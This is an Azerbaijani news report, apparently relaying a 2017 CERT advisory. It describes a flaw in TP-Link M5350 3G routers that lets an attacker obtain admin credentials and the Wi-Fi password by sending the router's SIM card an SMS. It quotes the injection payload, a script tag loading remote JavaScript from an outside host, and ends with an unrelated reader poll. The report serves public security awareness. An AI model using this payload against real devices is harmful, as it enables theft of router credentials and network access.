Telefona SMS göndərməklə Wi-Fi şifrəsini öyrənmək olar

12-04-2017 / 12:55

Cihazın SİM-kartına SMS göndərmək yolu ilə inzibatçı uçot qeydlərinin və Wi-Fi şifrəsini əldə etmək olar.

Xeberler.az bildirir ki, bu barədə Xüsusi Dövlət Mühafizə Xidməti, Xüsusi Rabitə və İnformasiya Təhlükəsizliyi Dövlət Agentliyinin Kompüter İnsidentlərinə qarşı Mübarizə Mərkəzi ( CERT) məlumat yayıb.

Qeyd edilib ki, Almaniya mütəxəssisi Yan Xerş Çin istehsalı TP-Link şirkətinin marşrutlayıcılarındakı mövcud boşluqlar onun SİM-kartına xüsusi şriftlə SMS-mesaj göndərmək yolu ilə cihazın şifrəsini əldə etməyə imkan verdiyini bildirib. 

Problem 3G simsiz mobil - TP-Link M5350 marşrutlayıcıya aiddir. Belə ki, tədqiqatçı açıqlayıb ki, rabitə operatorları çox vaxt öz müştərilərinə marşrutlayıcıya SİM-kart yerləşdirilən bu modeli təklif edirlər.

SİM-kart marşrutlayıcıya operatorun şəbəkəsinə qoşulmağa imkan verir və istənilən digər SİM-kart kimi bunun da öz nömrəsi var. 

Marşrutlayıcının proqram təminatının analizi zamanı Xerş SMS-mesajların daxil olduğu emal funksiyasında mövcud boşluqları aşkara çıxardıb.

O müəyyənləşdirib ki,  şrift <script src=//n.ms/a.js >< /script > yolu ilə məlumatları göndərməklə inzibatçının uçot qeydlərinin şifrəsini, simsiz şəbəkə (SSID) identifikatorunu və Wi-Fi şəbəkəsinin şifrəsini əldə edə bilər.

Xeberler.az


ŞƏRHLƏR



sorğu
Delta Telecom şirkətinin son istifadəçiyə birbaşa internet xidməti göstərməsi internet bazarında vəziyyəti necə dəyişə bilər ?
  • “Çəkidə aldatma” aradan qalxacaq və internetin keyfiyyəti yüksələcək.
  • İnternet bazarında sərbəst və azad rəqabət güclənəcək.
  • Qiymətlər enəcək və daha sürətli internetdən istifadə edənlərin sayı kəskin artacaq
  • İnternet bazarında rəqabət azalacaq.